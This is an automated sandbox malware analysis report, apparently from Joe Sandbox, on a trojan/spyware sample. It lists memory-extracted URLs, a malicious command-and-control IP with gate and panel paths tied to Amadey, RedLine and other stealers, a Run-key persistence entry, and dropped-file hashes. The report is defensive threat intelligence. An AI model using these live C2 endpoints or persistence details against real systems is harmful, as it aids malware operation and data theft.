                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://api.ip.sb/ipexplorer.exe, 00000005.00000003.1603564510.000000000A37C000.00000004.00000001.00020000.00000000.sdmp, 25A2.tmp.ssg.exe, 00000006.00000000.1604653153.0000000000A92000.00000002.00000001.01000000.00000005.sdmp, 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, 25A2.tmp.ssg.exe.5.drfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id1ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader4F82.tmp.zx.exe, 0000000D.00000003.1734398027.0000020C08080000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000003.1735055146.0000020C08092000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000002.1740650444.0000020C0800D000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000003.1734398027.0000020C08053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA125A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.datacontract.org/2004/07/System.ServiceModel25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id24Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Entity/Id21ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000003.2173753327.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1541930991.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2801180854.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id5Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id15ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id10Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Renew25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id8Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentity25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://java.coexplorer.exe, 00000005.00000003.2173753327.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1541930991.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2801180854.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.microexplorer.exe, 00000005.00000000.1534506851.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2791299993.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1531993799.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/:hardwares.25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://tempuri.org/D25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingex25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crl.thawte.com/ThawteTimestampingCA.crl04F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ151025A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://tempuri.org/Entity/Id13Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://tempuri.org/Entity/Id12ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002F69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA125A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA125A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/Entity/Id7ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id4ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2002/12/policy25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.datacontract.org/2004/07/System.ServiceModel$25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://tempuri.org/Entity/Id22Response25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://tempuri.org/Entity/Id22ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://tempuri.org/Entity/Id16ResponseD25A2.tmp.ssg.exe, 00000006.00000002.1823760251.000000000328C000.00000004.00000800.00020000.00000000.sdmp, 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              185.81.68.147
                                                                                                                                                                                                              		unknownFinland
                                                                                                                                                                                                              		50108KLNOPT-ASFItrue

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1575324
                                                                                                                                                                                                              Start date and time:2024-12-15 09:14:14 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 10m 34s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:20
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:3Qv3xyyL5G.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:da8fee4a89f0b7cee6c8aee970044116.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@29/57@0/1
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 65%
                                                                                                                                                                                                              • Number of executed functions: 158
                                                                                                                                                                                                              • Number of non-executed functions: 304
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 4.175.87.197, 13.107.246.63
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              03:15:29API Interceptor7076x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                              03:15:29API Interceptor6770x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                                              03:15:29API Interceptor389416x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                              03:15:32API Interceptor6093x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                              03:15:48API Interceptor80x Sleep call for process: 25A2.tmp.ssg.exe modified
                                                                                                                                                                                                              09:15:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe
                                                                                                                                                                                                              09:15:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              185.81.68.147K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147/VzCAHn.php?616766F8886C145454191
                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                              • 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
                                                                                                                                                                                                              mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                              D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                              D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                              hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.147/7vhfjke3/index.php?wal=1
                                                                                                                                                                                                              tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                              yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
                                                                                                                                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                              • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              KLNOPT-ASFIK6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147
                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                              • 185.81.68.147
                                                                                                                                                                                                              mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                              • 185.81.68.148
                                                                                                                                                                                                              D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.148
                                                                                                                                                                                                              D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.148
                                                                                                                                                                                                              hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.148
                                                                                                                                                                                                              tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 185.81.68.148
                                                                                                                                                                                                              eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147
                                                                                                                                                                                                              yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                              • 185.81.68.148
                                                                                                                                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                              • 185.81.68.147

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeK6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                                                mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                  yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeK6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse

                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\25A2.tmp.ssg.exe.log

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3293
                                                                                                                                                                                                                      Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85Vsql:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qp
                                                                                                                                                                                                                      MD5:1255FDF0A9A1C19092A78046C2B3B108
                                                                                                                                                                                                                      SHA1:869678412F6D9879B84D57DCA18E46F986F173B5
                                                                                                                                                                                                                      SHA-256:B6F9DDE82E514AB4C6A9DF4EB8A3EF7694C5A82D0CACE9FDA1318FD70359F58E
                                                                                                                                                                                                                      SHA-512:55C29CAF8C13614F9E8EB5C7D9A2C1BCD180D6A7200693A74AFAFC7C092C7329865A10B82B46FE668B3FB13C43EDAEB60F0CBF64498BF984D4688CF9D5999AD9
                                                                                                                                                                                                                      Malicious:false
